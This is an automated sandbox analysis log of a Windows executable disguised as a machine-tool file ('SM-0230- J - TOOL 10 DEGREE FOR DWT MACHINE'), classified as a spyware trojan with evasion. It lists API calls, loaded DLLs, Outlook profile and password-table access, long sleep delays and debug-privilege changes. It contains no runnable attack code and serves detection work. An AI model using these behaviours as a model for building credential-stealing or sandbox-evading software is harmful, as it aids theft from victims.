Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C85222 11_2_38C85222
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C83238 11_2_38C83238
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8DE38 11_2_38C8DE38
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C85B38 11_2_38C85B38
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C89B38 11_2_38C89B38
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8B330 11_2_38C8B330
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C87031 11_2_38C87031
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAF668 11_2_38CAF668
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA1828 11_2_38CA1828
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAF988 11_2_38CAF988
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA7FA8 11_2_38CA7FA8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAB4C8 11_2_38CAB4C8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA82C8 11_2_38CA82C8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAE6C8 11_2_38CAE6C8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA82C0 11_2_38CA82C0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAD0E8 11_2_38CAD0E8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA9EE8 11_2_38CA9EE8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA04F8 11_2_38CA04F8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CABAF9 11_2_38CABAF9
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAECF9 11_2_38CAECF9
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA88FE 11_2_38CA88FE
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAE088 11_2_38CAE088
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAAE88 11_2_38CAAE88
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA0E98 11_2_38CA0E98
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA9898 11_2_38CA9898
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CACA98 11_2_38CACA98
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA0E92 11_2_38CA0E92
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAFCA8 11_2_38CAFCA8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CACAA8 11_2_38CACAA8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA98A8 11_2_38CA98A8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAE6BB 11_2_38CAE6BB
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAA848 11_2_38CAA848
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CADA48 11_2_38CADA48
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA0040 11_2_38CA0040
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CADA40 11_2_38CADA40
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CA9258 11_2_38CA9258
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAC457 11_2_38CAC457
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38CAC468 11_2_38CAC468
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: String function: 00402A3A appears 52 times
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamefreedoms solitrringenes.exeDVarFileInfo$ vs SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.0000000070CBB000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamefreedoms solitrringenes.exeDVarFileInfo$ vs SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/9@5/5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004030D9
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 11_2_004030D9
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00404320 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404320
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_0040205E LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk, 0_2_0040205E
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File created: C:\Users\user\falden Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Mutant created: NULL
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File created: C:\Users\user\AppData\Local\Temp\nss2FBA.tmp Jump to behavior
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036406000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File read: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process created: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process created: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe" Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File written: C:\Users\user\hanknsordet.ini Jump to behavior
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Windows.Forms.pdb source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp

Data Obfuscation

Source: Yara match File source: 00000000.00000002.1494958612.000000000597D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1493431079.0000000000507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1493431079.0000000000515000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe PID: 8984, type: MEMORYSTR
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_10002D20 push eax; ret 0_2_10002D4E
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019C348 push eax; ret 11_3_0019C349
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_3_0019CFBE push eax; iretd 11_3_0019CFC5
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File created: \sm-0230- j - tool 10 degree for dwt machine-mf5i.exe
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe File created: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe API/Special instruction interceptor: Address: 6242F29
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe API/Special instruction interceptor: Address: 2A72F29
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Memory allocated: 110000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Memory allocated: 361E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Memory allocated: 36130000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe API coverage: 0.2 %
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe TID: 4992 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe TID: 4992 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00406001 FindFirstFileA,FindClose, 0_2_00406001
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_0040559F
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00402688 FindFirstFileA, 0_2_00402688
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_00406001 FindFirstFileA,FindClose, 11_2_00406001
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_00402688 FindFirstFileA, 11_2_00402688
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 11_2_0040559F
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00401751 lstrcatA,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatA, 0_2_00401751
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Memory allocated: page read and write | page guard
